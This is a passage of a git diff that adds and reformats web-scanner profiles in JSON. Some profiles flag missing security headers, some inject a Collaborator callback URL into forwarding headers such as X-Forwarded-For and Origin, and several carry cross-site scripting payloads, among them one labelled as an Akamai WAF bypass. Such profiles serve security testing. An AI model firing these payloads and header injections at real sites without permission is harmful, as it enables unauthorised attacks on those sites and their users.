+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "X-Content-Type-Options",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Security Header \"X-Content-Type-Options\" not present in response.",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/X-Frame-Options.bb b/profiles/X-Frame-Options.bb
new file mode 100755
index 0000000..2e51dee
--- /dev/null
+++ b/profiles/X-Frame-Options.bb
@@ -0,0 +1,59 @@
+[
+ {
+ "ProfileName": "X-Frame-Options",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,X-Frame-Options"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": true,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": true,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 1,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "X-Frame-Options",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Security Header \"X-Frame-Options\" not present in response.",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/X-Headers-Collaborator-combined.bb b/profiles/X-Headers-Collaborator-combined.bb
index 1d7ffe9..7cdcb1c 100755
--- a/profiles/X-Headers-Collaborator-combined.bb
+++ b/profiles/X-Headers-Collaborator-combined.bb
@@ -1 +1,159 @@
-[{"Name":"X-Headers-Collaborator-combined","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":["http://{BC}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["Collaborator","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":0,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"X-Headers-Collaborator-combined","IssueSeverity":"Medium","IssueConfidence":"Firm","IssueDetail":"X-Headers-Collaborator-combined","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Request","match":"X-Forwarded-For:.*","replace":"X-Forwarded-For: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"X-Host:.*","replace":"X-Host: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"X-Forwarded-Server:*","replace":"X-Forwarded-Server: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"X-Forwarded-Scheme:.*","replace":"X-Forwarded-Scheme: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"X-Original-URL:.*","replace":"X-Original-URL: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"X-Rewrite-URL:.*","replace":"X-Rewrite-URL: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"Forwarded: for\u003d.*","replace":"Forwarded: for\u003d {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"Origin:.*","replace":"Origin: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"Referer:.*","replace":"Referer: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"X-Forwarded-Host:.*","replace":"X-Forwarded-Host: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"X-Forwarded-Proto:.*","replace":"X-Forwarded-Proto: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"X-ProxyUser-Ip:.*","replace":"X-ProxyUser-Ip: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"X-Wap-Profile:.*","replace":"X-Wap-Profile: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"Client-IP:.*","replace":"Client-IP: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"True-Client-IP:.*","replace":"True-Client-IP: {PAYLOAD}","regex":"Regex"},{"type":"Request","match":"Cluster-Client-IP:.*","replace":"Cluster-Client-IP: {PAYLOAD}","regex":"Regex"}],"VariationAttributes":[],"InsertionPointType":[32],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "X-Headers-Collaborator-combined",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@Sy3Omda",
+ "Payloads": [
+ "true,http://{BC}"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [],
+ "Tags": [
+ "Collaborator",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 0,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "X-Headers-Collaborator-combined",
+ "IssueSeverity": "Medium",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "X-Headers-Collaborator-combined",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [
+ {
+ "type": "Request",
+ "match": "X-Forwarded-For:.*",
+ "replace": "X-Forwarded-For: {PAYLOAD}",
+ "regex": "Regex"
+ },
+ {
+ "type": "Request",
+ "match": "X-Host:.*",
+ "replace": "X-Host: {PAYLOAD}",
+ "regex": "Regex"
+ },
+ {
+ "type": "Request",
+ "match": "X-Forwarded-Server:*",
+ "replace": "X-Forwarded-Server: {PAYLOAD}",
+ "regex": "Regex"
+ },
+ {
+ "type": "Request",
+ "match": "X-Forwarded-Scheme:.*",
+ "replace": "X-Forwarded-Scheme: {PAYLOAD}",
+ "regex": "Regex"
+ },
+ {
+ "type": "Request",
+ "match": "X-Original-URL:.*",
+ "replace": "X-Original-URL: {PAYLOAD}",
+ "regex": "Regex"
+ },
+ {
+ "type": "Request",
+ "match": "X-Rewrite-URL:.*",
+ "replace": "X-Rewrite-URL: {PAYLOAD}",
+ "regex": "Regex"
+ },
+ {
+ "type": "Request",
+ "match": "Forwarded: for\u003d.*",
+ "replace": "Forwarded: for\u003d {PAYLOAD}",
+ "regex": "Regex"
+ },
+ {
+ "type": "Request",
+ "match": "Origin:.*",
+ "replace": "Origin: {PAYLOAD}",
+ "regex": "Regex"
+ },
+ {
+ "type": "Request",
+ "match": "Referer:.*",
+ "replace": "Referer: {PAYLOAD}",
+ "regex": "Regex"
+ },
+ {
+ "type": "Request",
+ "match": "X-Forwarded-Host:.*",
+ "replace": "X-Forwarded-Host: {PAYLOAD}",
+ "regex": "Regex"
+ },
+ {
+ "type": "Request",
+ "match": "X-Forwarded-Proto:.*",
+ "replace": "X-Forwarded-Proto: {PAYLOAD}",
+ "regex": "Regex"
+ },
+ {
+ "type": "Request",
+ "match": "X-ProxyUser-Ip:.*",
+ "replace": "X-ProxyUser-Ip: {PAYLOAD}",
+ "regex": "Regex"
+ },
+ {
+ "type": "Request",
+ "match": "X-Wap-Profile:.*",
+ "replace": "X-Wap-Profile: {PAYLOAD}",
+ "regex": "Regex"
+ },
+ {
+ "type": "Request",
+ "match": "Client-IP:.*",
+ "replace": "Client-IP: {PAYLOAD}",
+ "regex": "Regex"
+ },
+ {
+ "type": "Request",
+ "match": "True-Client-IP:.*",
+ "replace": "True-Client-IP: {PAYLOAD}",
+ "regex": "Regex"
+ },
+ {
+ "type": "Request",
+ "match": "Cluster-Client-IP:.*",
+ "replace": "Cluster-Client-IP: {PAYLOAD}",
+ "regex": "Regex"
+ }
+ ],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 32
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/X-Headers-Collaborator.bb b/profiles/X-Headers-Collaborator.bb
index 4caa0a6..f0163b7 100755
--- a/profiles/X-Headers-Collaborator.bb
+++ b/profiles/X-Headers-Collaborator.bb
@@ -1 +1,133 @@
-[{"Name":"X-Headers-Collaborator","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["http://{BC}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["Collaborator","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":1,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"X-Headers-Collaborator","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"X-Headers-Collaborator","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Request","match":"","replace":"X-Forwarded-For: {PAYLOAD}","regex":"String"},{"type":"Request","match":"","replace":"X-Host: {PAYLOAD}","regex":"String"},{"type":"Request","match":"","replace":"X-Forwarded-Server: {PAYLOAD}","regex":"String"},{"type":"Request","match":"","replace":"X-Forwarded-Scheme: {PAYLOAD}","regex":"String"},{"type":"Request","match":"","replace":"X-Original-URL: {PAYLOAD}","regex":"String"},{"type":"Request","match":"","replace":"X-Rewrite-URL: {PAYLOAD}","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "X-Headers-Collaborator",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,http://{BC}"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [],
+ "Tags": [
+ "Collaborator",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 1,
+ "MaxRedir": 0,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "X-Headers-Collaborator",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "X-Headers-Collaborator",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [
+ {
+ "type": "Request",
+ "match": "",
+ "replace": "X-Forwarded-For: {PAYLOAD}",
+ "regex": "String"
+ },
+ {
+ "type": "Request",
+ "match": "",
+ "replace": "X-Host: {PAYLOAD}",
+ "regex": "String"
+ },
+ {
+ "type": "Request",
+ "match": "",
+ "replace": "X-Forwarded-Server: {PAYLOAD}",
+ "regex": "String"
+ },
+ {
+ "type": "Request",
+ "match": "",
+ "replace": "X-Forwarded-Scheme: {PAYLOAD}",
+ "regex": "String"
+ },
+ {
+ "type": "Request",
+ "match": "",
+ "replace": "X-Original-URL: {PAYLOAD}",
+ "regex": "String"
+ },
+ {
+ "type": "Request",
+ "match": "",
+ "replace": "X-Rewrite-URL: {PAYLOAD}",
+ "regex": "String"
+ }
+ ],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/X-XSS-Protection.bb b/profiles/X-XSS-Protection.bb
new file mode 100755
index 0000000..d7325ea
--- /dev/null
+++ b/profiles/X-XSS-Protection.bb
@@ -0,0 +1,59 @@
+[
+ {
+ "ProfileName": "X-XSS-Protection",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,X-XSS-Protection: 1;"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": true,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": true,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 1,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "X-XSS-Protection",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Security Header \"X-XSS-Protection\" not present in response.",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/XSS - Akamai GHost bypass.bb b/profiles/XSS - Akamai GHost bypass.bb
new file mode 100755
index 0000000..704122c
--- /dev/null
+++ b/profiles/XSS - Akamai GHost bypass.bb
@@ -0,0 +1,97 @@
+[
+ {
+ "ProfileName": "XSS - Akamai GHost bypass",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,\u003cdETAILS%0aopen%0aonToGgle%0a\u003d%0aa\u003dprompt,a()x\u003e"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,\u003cdETAILS"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": true,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "text/plain",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 4,
+ "MaxRedir": 0,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "XSS - Akamai GHost bypass",
+ "IssueSeverity": "Medium",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/XSS-Akamai_GHost_bypass.bb b/profiles/XSS-Akamai_GHost_bypass.bb
deleted file mode 100755
index 5b41461..0000000
--- a/profiles/XSS-Akamai_GHost_bypass.bb
+++ /dev/null
@@ -1 +0,0 @@
-[{"Name":"XSS-Akamai_GHost_bypass","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003cdETAILS%0aopen%0aonToGgle%0a\u003d%0aa\u003dprompt,a()x\u003e"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,\u003cdETAILS"],"Tags":["XSS","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":true,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/plain","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"XSS - Akamai GHost bypass","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/XSS.bb b/profiles/XSS.bb
index 4908113..169e961 100755
--- a/profiles/XSS.bb
+++ b/profiles/XSS.bb
@@ -1 +1,104 @@
-[{"Name":"XSS","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003c/script\u003e\u003cscript\u003econfirm(1)\u003c/script\u003e","\"\u003e\u003cimg src\u003dx onerror\u003dprompt(1);\u003e.","\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e","\u003csvg oNLoAd\u003dalert(\u0027XSS\u0027)\u003e","\u003csvg/oNLoAd\u003dalert(1)\u003e","\"\u003e\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e\u003c!--","\u003csvg\u003e\u003cscript\u003ealert\u0026#40/1/.source\u0026#41\u003c/script\u003e\u003c/svg\u003e","javascript:/*--\u003e\u003c/title\u003e\u003c/style\u003e\u003c/textarea\u003e\u003c/script\u003e\u003c/xmp\u003e\u003csvg/onload\u003d\u0027+/\"/+/onmouseover\u003d1/+/[*/[]/+alert(11)//\u0027\u003e","\u003cmarquee loop\u003d1 width\u003d0 onfinish\u003dalert(2)\u003e"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["XSS","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":true,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/plain,text/fragment+html,application/json","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":3,"RedirType":4,"MaxRedir":5,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"XSS","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"XSS with payloads: \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "XSS",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,\u003c/script\u003e\u003cscript\u003econfirm(1)\u003c/script\u003e",
+ "true,\"\u003e\u003cimg src\u003dx onerror\u003dprompt(1);\u003e.",
+ "true,\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e",
+ "true,\u003csvg oNLoAd\u003dalert(\u0027XSS\u0027)\u003e",
+ "true,\u003csvg/oNLoAd\u003dalert(1)\u003e",
+ "true,\"\u003e\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e\u003c!--",
+ "true,\u003csvg\u003e\u003cscript\u003ealert\u0026#40/1/.source\u0026#41\u003c/script\u003e\u003c/svg\u003e",
+ "true,javascript:/*--\u003e\u003c/title\u003e\u003c/style\u003e\u003c/textarea\u003e\u003c/script\u003e\u003c/xmp\u003e\u003csvg/onload\u003d\u0027+/\"/+/onmouseover\u003d1/+/[*/[]/+alert(11)//\u0027\u003e",
+ "true,\u003cmarquee loop\u003d1 width\u003d0 onfinish\u003dalert(2)\u003e"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [],
+ "Tags": [
+ "XSS",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": true,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/plain,text/fragment+html,application/json",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 3,
+ "Scope": 0,
+ "RedirType": 4,
+ "MaxRedir": 5,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "XSS",
+ "IssueSeverity": "Medium",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "XSS with payloads: \u003cpayload\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/XSSHtmlUrlEncode.bb b/profiles/XSSHtmlUrlEncode.bb
index d17fe2a..8006d10 100755
--- a/profiles/XSSHtmlUrlEncode.bb
+++ b/profiles/XSSHtmlUrlEncode.bb
@@ -1 +1,107 @@
-[{"Name":"XSSHtmlUrlEncode","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003c/script\u003e\u003cscript\u003econfirm(1)\u003c/script\u003e","\"\u003e\u003cimg src\u003dx onerror\u003dprompt(1);\u003e.","\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e","\u003csvg oNLoAd\u003dalert(\u0027XSS\u0027)\u003e","\u003csvg/oNLoAd\u003dalert(1)\u003e","\"\u003e\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e\u003c!--","\u003csvg\u003e\u003cscript\u003ealert\u0026#40/1/.source\u0026#41\u003c/script\u003e\u003c/svg\u003e","javascript:/*--\u003e\u003c/title\u003e\u003c/style\u003e\u003c/textarea\u003e\u003c/script\u003e\u003c/xmp\u003e\u003csvg/onload\u003d\u0027+/\"/+/onmouseover\u003d1/+/[*/[]/+alert(11)//\u0027\u003e","\u003csvg \u003c/onload \u003d\"1\u003e (_\u003dalert,_(1337)) \"\"\u003e","\u003cmarquee loop\u003d1 width\u003d0 onfinish\u003dalert(2)\u003e"],"Encoder":["HTML-encode all characters"],"UrlEncode":true,"CharsToUrlEncode":"\u0026;#","Grep":[],"Tags":["XSS","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":true,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/html","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":4,"RedirType":4,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"XSSHtmlUrlEncode","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "XSSHtmlUrlEncode",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,\u003c/script\u003e\u003cscript\u003econfirm(1)\u003c/script\u003e",
+ "true,\"\u003e\u003cimg src\u003dx onerror\u003dprompt(1);\u003e.",
+ "true,\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e",
+ "true,\u003csvg oNLoAd\u003dalert(\u0027XSS\u0027)\u003e",
+ "true,\u003csvg/oNLoAd\u003dalert(1)\u003e",
+ "true,\"\u003e\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e\u003c!--",
+ "true,\u003csvg\u003e\u003cscript\u003ealert\u0026#40/1/.source\u0026#41\u003c/script\u003e\u003c/svg\u003e",
+ "true,javascript:/*--\u003e\u003c/title\u003e\u003c/style\u003e\u003c/textarea\u003e\u003c/script\u003e\u003c/xmp\u003e\u003csvg/onload\u003d\u0027+/\"/+/onmouseover\u003d1/+/[*/[]/+alert(11)//\u0027\u003e",
+ "true,\u003csvg \u003c/onload \u003d\"1\u003e (_\u003dalert,_(1337)) \"\"\u003e",
+ "true,\u003cmarquee loop\u003d1 width\u003d0 onfinish\u003dalert(2)\u003e"
+ ],
+ "Encoder": [
+ "HTML-encode all characters"
+ ],
+ "UrlEncode": true,
+ "CharsToUrlEncode": "\u0026;#",
+ "Grep": [],
+ "Tags": [
+ "XSS",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": true,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/html",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 4,
+ "Scope": 0,
+ "RedirType": 4,
+ "MaxRedir": 0,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "XSSHtmlUrlEncode",
+ "IssueSeverity": "Medium",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/XSSUrlEncode.bb b/profiles/XSSUrlEncode.bb
index b0260c1..151fb82 100755
